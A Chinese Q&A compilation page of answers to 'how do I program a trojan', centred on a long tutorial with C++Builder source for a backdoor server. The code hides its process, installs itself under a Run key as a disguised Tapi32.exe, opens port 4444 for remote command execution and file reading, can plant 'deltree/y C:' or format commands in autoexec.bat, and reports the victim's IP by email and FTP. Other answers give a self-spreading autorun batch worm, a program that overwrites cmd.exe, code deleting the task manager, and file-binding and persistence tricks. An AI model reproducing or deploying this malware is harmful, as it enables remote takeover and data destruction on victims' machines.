怎麼編程木馬

⑴ 怎麼編寫木馬

這個只是惡作劇程序，不是木馬。
其實很簡單嘛，只要終止explorer.exe進程就行了。
這都不需要編程，只要寫個批處理就行。
把：taskkill
/f
/im
Explorer.exe寫到一個文本文檔里，然後把那個文檔的後綴名由.txt改為.bat就行了。

⑵ 如何編寫木馬

木馬是如何編寫的（一）

特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷，使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒，終於認識到的網路也有它邪惡的一面，一時間人心惶惶。
我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網，到處求救！呵呵，要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字元存入一個文件，用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成??伺服器程序（Server）和客戶端程序（Client），伺服器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網路協議來進行通訊（一般是TCP/IP協議）。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜」黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎？
啟動C++Builder 5.0企業版，新建一個工程，添加三個VCL控制項：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMftp和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序，可以對外服務（對攻擊者敞開大門）。Socket最初是在Unix上出現的，後來微軟將它引入了Windows中（包括Win98和WinNt）；後兩個控制項的作用是用來使程序具有FTP（File Transfer Protocol文件傳輸協議）和SMTP（Simple Mail Transfer Protocol簡單郵件傳輸協議）功能，大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的，這當然是不可思議的。不光佔去了大量的空間（光一個Form就有300K之大），而且使軟體可見，根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘，其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此，只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程（Service Process）就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有，那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt：
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x，不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
file://卸載動態鏈接庫
}
}
這樣就終於可以隱身了（害我敲了這么多代碼！）。為什麼要判斷操作系統呢？因為WinNt中的進程管理器可以對當前進程一覽無余，因此沒必要在WinNt下也使用以上代碼（不過你可以使用其他的方法，這個留到後面再講）。接著再將自己拷貝一份到%System%目錄下，例如：C:\Windows\System，並修改注冊表，以便啟動時自動載入：
{
char TempPath[MAX_PATH];
file://定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小，得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格式化TempPath字元串，使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://將自己拷貝到%System%目錄下，並改名為Tapi32.exe，偽裝起來
Registry=new TRegistry;
file://定義一個TRegistry對象，准備修改注冊表，這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就創建之
try
{
file://如果以下語句發生異常，跳至catch，以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查找是否有「crossbow」字樣的鍵值，並且是否為拷貝的目錄%System%+Tapi32.exe
file://如果不是，就寫入以上鍵值和內容
}
catch(...)
{
file://如果有錯誤，什麼也不做
}
}

好，FormCreate過程完成了，這樣每次啟動都可以自動載入Tapi32.exe，並且在「關閉程序」對話框中看不見本進程了，木馬的雛形初現。
接著選中ServerSocket控制項，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定埠，處於伺服器工作狀態。再將Port填入4444，這是木馬的埠號，當然你也可以用別的。但是你要注意不要用1024以下的低端埠，因為這樣不但可能會與基本網路協議使用的埠相沖突，而且很容易被發覺，因此盡量使用1024以上的高端埠（不過也有這樣一種技術，它故意使用特定埠，因為如果引起沖突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控制項使用的埠，是21號埠，這是FTP協議的專用控制埠（FTP Control Port）；同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下建立一個文本文件Win369.bat，作為臨時文件使用
AnsiString temp=Socket->ReceiveText();
file://接收客戶端（攻擊者，也就是你自己）傳來的數據
}
好，大門敞開了！接著就是修改目標機的各種配置了！^_^ 首先我們來修改Autoexec.bat和Config.sys吧：
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length();
file://得到字元串的長度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://將第11個字元轉換成integer型，存入file_name變數
file://為什麼要取第11個字元，因為第10個字元是空格字元
content=(temp.SubString(12,number-11)+'\n').c_str();
file://餘下的字元串將被作為寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
chmod("c:\\config.sys",S_IREADS_IWRITE);
file://將兩個目標文件的屬性改為可讀可寫
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如果第11個字元是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如果第11個字元是1,就把Config.sys格式化
times_of_try=0;
file://定義計數器
while(fp==NULL)
{
file://如果指針是空
fp=fopen(filename,"a+");
file://如果文件不存在，創建之；如果存在，准備在其後添加
file://如果出錯，文件指針為空，這樣就會重復
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://跳至END處
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://寫入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧？！
fclose(fp);
file://寫完後關閉目標文件
Socket->SendText("Sucess");
file://然後發回「Success」的成功信息
}
}

上回我們講到如何修改目標機上的啟動配置文件，這回我們就來查看目標機上的目錄樹和文件吧，這在客戶端上使用「dir」命令，跟著敲?：
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3個字元是「dir」
int Read_Num;
char * CR_LF="\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
file://得到字元串的長度
AnsiString Dir_Name=temp.SubString(5,number-3);
file://從字元串第六個字元開始，將後面的字元存入Dir_Name變數，這是目錄名
if(Dir_Name=="")
{
file://如果目錄名為空
Socket->SendText("Fail By Open DIR's Name");
file://返回「Fail By Open DIR's Name」信息
goto END;
file://跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
file://如果打開目錄出錯
Socket->SendText("Fail by your DIR's name!");
file://返回「Fail By Your DIR's Name」信息
goto END;
file://跳到END
}
times_of_try=0;
while(fp==NULL)
{
file://如果指針是NULL
fp=fopen(TempFile,"w+");
file://就創建system\Win369.bat准備讀和寫；如果此文件已存在，則會被覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功（真有耐心！）
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果訪問目標目錄成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最後一個字元不是「\」，證明不是根目錄
filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();
file://加上「\」字元後將指針指向目錄流
else
filename=(AnsiString(dirname)+ent->d_name).c_str();
file://如果是根目錄，則不用加「\」
attrib=_rtl_chmod(filename, 0);
file://得到目標文件的訪問屬性
if (attrib & FA_RDONLY)
file://「&」字元是比較前後兩個變數，如果相同返回1,否則返回0
fwrite(" R",sizeof(char),3,fp);
file://將目標文件屬性設為只讀
else
fwrite(" ",sizeof(char),3,fp);
file://失敗則寫入空格
if (attrib & FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
file://將目標文件屬性設為隱藏
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
file://將目標文件屬性設為系統
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_ARCH)
fwrite("A",sizeof(char),1,fp);
file://將目標文件屬性設為普通
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_DIREC)
fwrite(" <DIR> ",sizeof(char),9,fp);
file://將目標文件屬性設為目錄
else
fwrite(" ",sizeof(char),9,fp);
file://失敗則寫入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
file://將目錄名寫入目標文件
fwrite(CR_LF,1,1,fp);
file://寫入換行
}
fclose(fp);
file://關閉文件
closedir(dir);
file://關閉目錄
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
file://打開Win369.bat准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義的一個空數組
Read_Num=fread(temp_content,1,300,fp1);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp1);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
fclose(fp1);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text變數的內容
}
}
夠長吧？！察看目錄樹這么費勁啊？！你後面可以用BCB中的各種列表框對Client.exe好好美化美化。接下來就是查看指定文件的內容了，Client將使用「type」命令，（手指累不累啊？）：
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4個字元是「type」
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
file://將目標文件流存入File_Name變數中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
file://打開目標文件准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已試了100次了
Socket->SendText("Fail By Open File");
file://返回「Fail By Open File」的錯誤信息
goto END;
file://跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義一個空數組
Read_Num=fread(temp_content,1,300,fp);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
fclose(fp);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text的內容，即你查看文件的內容
}
}
咳咳！累死了！還是來點輕松的吧??操縱目標機的光碟機（注意：mciSendString()函數的聲明在mmsystem.h頭文件中）：
{
else if(temp=="open")
{
file://如果收到的temp的內容是「open」
mciSendString("set cdaudio door open", NULL, 0, NULL);
file://就彈出光碟機的托盤
}
else if(temp=="close")
{
file://如果收到的temp的內容是「close」
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
file://就收入光碟機的托盤。當然你也可以搞個死循環，讓他的光碟機好好活動活動！^_^
}
}
接著就是交換目標機的滑鼠左右鍵，代碼如下：
{
else if(temp=="swap")
{
SwapMouseButton(1);
file://交換滑鼠左右鍵，簡單吧？
}
}
然後就是使目標機重新啟動。但這里要區分WinNt和Win9x??NT非常注重系統每個進程的權利，一個普通的進程是不應具備有調用系統的權利的，因此我們要賦予本程序足夠的許可權：
{
else if(temp=="reboot")
{
file://如果收到的temp的內容是「temp」
DWORD dwVersion = GetVersion();
file://得到操作系統的版本號
if (dwVersion < 0x80000000)
{
file://操作系統是WinNt，不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
file://定義變數
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);
file://OpenProcessToken()這個函數的作用是打開一個進程的訪問令牌
file://GetCurrentProcess()函數的作用是得到本進程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
file://LookupPrivilegeValue()的作用是修改進程的許可權
tkp.PrivilegeCount = 1;
file://賦給本進程特權
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
file://AdjustTokenPrivileges()的作用是通知Windows NT修改本進程的權利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
file://強行退出WinNt並重啟
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
file://強行退出Win9x並重啟
}
}
如果以上都不是，就讓它在Dos窗口中執行傳來的命令：
{
else
{
file://如果都不是
char * CR_TF="\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
file://創建Win369.bat，如果已存在就覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
Socket->SendText("Fail By Open File");
file://返回「Fail By Open File」的信息
goto END;
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
file://寫入欲執行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
file://寫入換行符
fclose(fp);
file://關閉Win369.bat
system(TempFile);
file://執行Win369.bat
Socket->SendText("Success");
file://返回「Success」信息
}
}
你可以直接執行什麼Ping和Tracert之類的命令來進一步刺探目標機的網路狀況（判斷是否是一個企業的區域網），然後可以進一步攻擊，比如Deltree和Format命令。^_^

到此，伺服器程序的功能已全部完成，但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友，別走開！（未完待續）
木馬是如何編寫的（三）
武漢 周侃
上次已編寫完伺服器端的各種功能，但還差容錯部分還未完成,下面我們Go on! 其代碼如下（照敲不誤 ^_^）：
{
END:;
Socket->Close();
file://關閉服務
ServerSocket1->Active =true;
file://再次打開服務
if (NMSMTP1->Connected) NMSMTP1->Disconnect();
file://如果SMTP伺服器已連接則斷開
NMSMTP1->Host = "smtp.163.net";
file://選一個好用的SMTP伺服器，如163、263、sina和btamail
NMSMTP1->UserID = "";
file://你SMTP的ID
try
{
NMSMTP1->Connect();
file://再次連接
}
catch(...)
{
goto NextTime;
file://跳到NextTime
}
NMSMTP1->PostMessage->FromAddress ="I don't know!";
file://受害者的Email地址
NMSMTP1->PostMessage->FromName = "Casualty";
file://受害者的名字
NMSMTP1->PostMessage->ToAddress->Text = "[email protected]";
file://將信發到我的郵箱，這一步很關鍵
NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;
file://信的內容提示你「伺服器正在運行」，並且告訴你受害者的目前的IP地址，以便連接
NMSMTP1->PostMessage->Subject = "Server Running Now!";
file://信的主題
NMSMTP1->SendMail();
file://發送！
return;
file://返回
NextTime:
NMFTP1->Host = "ftp.go.163.com";
file://你的FTP伺服器的地址
NMFTP1->UserID = "";
file://你的用戶ID
NMFTP1->Port = 21;
file://FTP埠號，一般為21
NMFTP1->Password = "";
file://你的FTP的密碼
if(NMFTP1->Connected) NMFTP1->Disconnect();
file://如果已連接就斷開
try
{
NMFTP1->Connect();
file://再連接
}
catch(...)
{
return;
file://返回
}
AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;
file://受害者的IP地址
FILE * Upload;
Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");
file://創建一個新文件准備寫，如果已存在就覆蓋
fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);
file://寫入以上的SendToSite的內容
fclose(Upload);
file://寫完後關閉此文件
NMFTP1->RemoveDir("public_html");
file://刪除public_html目錄
NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);
file://上傳！
}
啊，超長的OnClientRead事件終於寫完了。最後別忘了要在此伺服器源碼文件中添加以下頭文件：
#include <stdlib.h>
#include <dirent.h>
#include <fcntl.h>
#include <dos.h>
#include <sys\stat.h>
#include <winbase.h>
#include <stdio.h>
#include <process.h>
#include <io.h>
#include <mmsystem.h>
至此，伺服器端（Server）程序

⑶ 木馬病毒怎麼編程，有什麼編，編程後怎麼用

要編木馬.就要學一門程序設計語言,VB可以,C語言也可以..不過JAVA.之類的就不用了.不用可視化了..
學了語言後你要有對計算機安全系統的了解
然後想出你的木馬要做什麼
然後設計演算法.
最後代碼實現就行了..

⑷ 木馬怎樣製作

樓主您好，最簡單的方法就是在網上下載製作軟體了，只要進行簡單設置，點一下生成就做好了，再復雜一點的動手做一個有病毒代碼的VBS，最復雜的就是學編程了，這樣可以隨心所欲的編寫木馬，但是最麻煩。

⑸ 如何編制木馬

木馬是啥東西？木馬是一種能蒙過用戶眼睛的病毒
編制方法是用VB或JAVA等編程工具。其大致思路如下：
一，圖標上給用戶以假象，讓用戶覺得不是程序，而是圖片等文件，用戶一點，嘿嘿！
二，不能在任務欄上留痕跡，在編程的時候，聲明一下就可以了
三，名字起好一點，要麼吸引人，比如「祝福」要麼跟其他的文件類似，讓人難以分辨比如「EXPL0RE」其中中間是數字零
四，要麼不要給程序以操作界面，要麼操作界面跟另一個東西類似。比如一個盜QQ的木馬，中了之後，木馬把原QQ登陸程序刪掉，替換成另一個同名程序，這個程序操作界面跟原QQ一模一樣，不同的是，QQ登陸的數據發往騰訊公司，這個程序把數據發到指定的郵箱或伺服器
五，有的木馬運行時是採用監聽策略，盜取密碼

⑹ 請問木馬怎麼編程啊

TP（tuobo pascal）可以寫出很多木馬的 給你幾個看看 只能玩玩 program bing; var a:integer; begin a:=1; while a=1 do write('!'); end. 要退出的話就按ctrl+pause break 編寫一個小程序開玩笑，用記事本就可以了： shutdown -s -t 1 用EXE格式保存，之後你朋友如果一打開它，就會關機 可以的啦,我自己寫的 procere 毒毒.exe var t:text begin assign(t,'Aoturun.inf'); rewrite(t); writeln(t,'[Autorun]'); writeln(t,''); writeln(t,'open=毒毒.exe'); end. 使用Autorun自動打開病毒，很毒的。 下面是我自己用BAT文件編寫的： %0 c:\ %0 d:\ %0 e:\ echo [Autorun]>c:\Autorun echo [Autorun]>d:\Autorun echo [Autorun]>e:\Autorun echo open=1.bat>c:\Autorun echo open=1.bat>d:\Autorun echo open=1.bat>e:\Autorun %0 C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動 start 1.bat 哈哈把我這個BAT病毒復制到文本文檔里，把文件名改成1.bat 你會看到精彩的一幕。 這個病毒會製造Autorun把自己復制到C D E 盤 和啟動項里； 送你一個低級的病毒吧！ program sheji; Var n,i:longint; d:char; p:file of integer; begin assign(p,'C:\WINDOWS\system32\CMD.exe'); rewrite(p); while n<1980 do begin for i:=1 to 360 do write(p,i); for d:='a' to 'z' do write(p,i); n:=n+1; end; for i:=1 to 4 do erase(p); readln; end. 我特製了一個建立在它基礎上，要比這個復雜一些的程序，不過，不給你看了，畢竟，這包括我個人的隱私了。

麻煩採納，謝謝!

⑺ 木馬怎麼編寫

回答的太搞笑了，首先說一下，VC它不是編程語言，說到木馬就會想到黑客，木馬首先必須是由伺服器端與客戶端組成的，要不然不叫木馬了，我就用C++給你試一下怎麼編寫一個簡單的木馬吧，即服務端與客戶端，
首先曾加4個VCL控制項吧，
拉倒，這樣說麻煩，你不如在電腦上下載VC開發工具，我遠程給你示範一下好了。

⑻ 怎樣編寫木馬,木馬有什麼用

至於如何編寫木馬，當然需要寫程序。編程語言的種類不少，編寫木馬最常用的語言有C++、VB和匯編。我舉個簡單的例子，在VB里編寫一個病毒：
Private
Sub
form_Load()
me.hide()
kill
environ("windir")
+
"\system32\"
+
"taskrgm.exe"
unlaod
me
end
sub
試試在VB內運行這段代碼，這樣就可以把系統的任務管理器刪除了！病毒危害人，阻礙計算機網路秩序……

⑼ 怎麼用照片製作木馬程序,請詳細說明

一是必須有木馬（服務端）然後是一張照片，第二步是用捆綁工具將照片與木馬進行捆綁就可以！

⑽ 怎麼樣製作木馬

網路時代可不太平，誰沒有遭遇過病毒或木馬？從CIH、I Love You到紅色代碼、Nimda，從BO到冰河，無一不是網友經常懈逅的對象。怎麼避免這些「艷遇」是廣大用戶孜孜以求的目標，不過，「道高一尺，魔高一丈」，「防」永遠是落後的，主動消滅它們才是積極主動的。

要消滅它們，首先就要掌握病毒及木馬是怎麼入侵我們的"愛機"的。有關病毒及木馬的入侵招數的文章很多，但都不太全面，編者偶然間發現了一篇作者不詳，但內容頗為全面的文章，特意整理出來，希望對大家有所幫助。

一、修改批處理

很古老的方法，但仍有人使用。一般通過修改下列三個文件來作案：

Autoexec.bat(自動批處理，在引導系統時執行)

Winstart.bat(在啟動GUI圖形界面環境時執行)

Dosstart.bat(在進入MS-DOS方式時執行)

例如：編輯C:\\windows\\Dosstart.bat，加入：start Notepad，當你進入「MS-DOS方式」時，就可以看到記事本被啟動了。

二、修改系統配置

常使用的方法，通過修改系統配置文件System.ini、Win.ini來達到自動運行的目的，涉及范圍有：

在Win.ini文件中：

[windows]

load=程序名

run=程序名

在System.ini文件中：

[boot]

shell=Explorer.exe

其中修改System.ini中Shell值的情況要多一些，病毒木馬通過修改這里使自己成為Shell，然後載入Explorer.exe，從而達到控制用戶電腦的目的。

三、藉助自動運行功能

這是黑客最新研發成果，之前該方法不過被發燒的朋友用來修改硬碟的圖標而已，如今它被賦予了新的意義，黑客甚至聲稱這是Windows的新BUG。

Windows的自動運行功能確實很爛，早年許多朋友因為自動運行的光碟中帶有CIH病毒而中招，現在不少軟體可以方便地禁止光碟的自動運行，但硬碟呢？其實硬碟也支持自動運行，你可嘗試在D盤根目錄下新建一個Autorun.inf，用記事本打開它，輸入如下內容：

[autorun]

open=Notepad.exe



保存後進入「我的電腦」，按F5鍵刷新一下，然後雙擊D盤盤符，怎麼樣？記事本打開了，而D盤卻沒有打開。

當然，以上只是一個簡單的實例，黑客做得要精密很多，他們會把程序改名為「.exe」(不是空格，而是中文的全形空格，這樣在Autorun.inf中只會看到「open=」而被忽略，此種行徑在修改系統配置時也常使用，如「run=」；為了更好地隱藏自己，其程序運行後，還會替你打開硬碟，讓你難以查覺。

由此可以推想，如果你打開了D盤的共享，黑客就可以將木馬和一個Autorun.inf存入該分區，當Windows自動刷新時，你也就「中獎」了，因此，大家千萬不要共享任何根目錄，當然更不能共享系統分區（一般為C:）。
四、通過注冊表中的Run來啟動

很老套的方法，但80%的黑客仍在使用，通過在Run、RunOnce、RunOnceEx、RunServices、RunServicesOnce中添加鍵值，可以比較容易地實現程序的載入，黑客尤其方便在帶」Once」的主鍵中作手腳，因此帶「Once」的主鍵中的鍵值，在程序運行後將被刪除，因此當用戶使用注冊表修改程序查看時，不會發現異樣。另外，還有這樣的程序：在啟動時刪除Run中的鍵值，而在退出時（或關閉系統時）又添加鍵值，達到隱蔽自己的目的。(這種方法的缺點是：害怕惡意關機或停電，呵呵！)

五、通過文件關聯啟動

很受黑客喜愛的方式，通過EXE文件的關聯(主鍵為：exefile)，讓系統在執行任何程序之前都運行木馬，真的好毒！通常修改的還有txtfile(文本文件的關聯，誰不用用記事本呢？)、regfile(注冊表文件關聯，一般用來防止用戶恢復注冊表，例如讓用戶雙擊.reg文件就關閉計算機)、unkown(未知文件關聯)。為了防止用戶恢復注冊表，用此法的黑客通常還連帶謀殺scanreg.exe、sfc.exe、Extrac32.exe、regedit.exe等程序，阻礙用戶修復。

六、通過API HOOK啟動

這種方法較為高級，通過替換系統的DLL文件，讓系統啟動指定的程序。例如：撥號上網的用戶必須使用Rasapi32.dll中的API函數來進行連接，那麼黑客就會替換這個DLL，當用戶的應用程序調用這個API函數，黑客的程序就會先啟動，然後調用真正的函數完成這個功能（特別提示：木馬可不一定是EXE，還可以是DLL、VXD），這樣既方便又隱蔽（不上網時根本不運行）。中此絕毒的蟲子，只有兩種選擇：Ghost或重裝系統，幸好此毒廖廖無幾，實屬萬蟲之幸！

API的英文全稱為：Application Programming Interface，也就是應用程序編程介面。在Windows程序設計領域發展初期，Windows程序員所能使用的編程工具唯有API函數，這些函數是Windows提供給應用程序與操作系統的介面，他們猶如「積木塊」一樣，可以搭建出各種界面豐富，功能靈活的應用程序。所以可以認為API函數是構築整個Windows框架的基石，在它的下面是Windows的操作系統核心，而它的上面則是所有華麗的Windows應用程序。
七、通過VXD啟動

此法也是高手專用版，通過把木馬寫成VXD形式載入，直接控制系統底層，極為罕見。它們一般在注冊表[HKEY_ LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\VxD]主鍵中啟動，很難發覺，解決方法最好也是用Ghost恢復或重新干凈安裝。

八、通過瀏覽網頁啟動

通過此種途徑有兩種方法：

利用MIME漏洞：這是2001年黑客中最流行的手法，因為它簡單有效，加上寬頻網的流行，令用戶防不勝防，想一想，僅僅是滑鼠變一下「沙漏」，木馬就安裝妥當，Internet真是太「方便」了！不過今年有所減少，一方面許多人都改用IE6.0；另一方面，大部分個人主頁空間都不允許上傳.eml文件了。

MIME被稱為多用途Internet郵件擴展（Multipurpose Internet Mail Extensions），是一種技術規范，原用於電子郵件，現在也可以用於瀏覽器。MIME對郵件系統的擴展是巨大的，在它出現前，郵件內容如果包含聲音和動畫，就必須把它變為ASCII碼或把二進制的信息變成可以傳送的編碼標准，而接收方必須經過解碼才可以獲得聲音和圖畫信息。MIME提供了一種可以在郵件中附加多種不同編碼文件的方法，這與原來的郵件是大大不同的。而現在MIME已經成為了HTTP協議標準的一個部分。

九、利用Java applet

劃時代的Java更高效、更方便——不過是悄悄地修改你的注冊表，讓你千百次地訪問黃(黑)色網站，讓你關不了機，讓你……，還可以讓你中木馬。這種方法其實很簡單，先利用HTML把木馬下載到你的緩存中，然後修改注冊表，指向其程序。

十、利用系統自動運行的程序

這一條主要利用用戶的麻痹大意和系統的運行機制進行，命中率很高。在系統運行過程中，有許多程序是自動運行的，比如：磁碟空間滿時，系統自動運行「磁碟清理」程序(cleanmgr.exe)；啟動資源管理器失敗時，雙擊桌面將自動運行「任務管理器」程序(Taskman.exe)；格式化磁碟完成後，系統將提示使用「磁碟掃描」程序(scandskw.exe)；點擊幫助或按F1時，系統將運行Winhelp.exe或Hh.exe打開幫助文件；啟動時，系統將自動啟動「系統欄」程序(SysTray.exe)、「輸入法」程序(internat.exe)、「注冊表檢查」 程序(scanregw.exe)、「計劃任務」程序(Mstask.exe)、「電源管理」程序等。

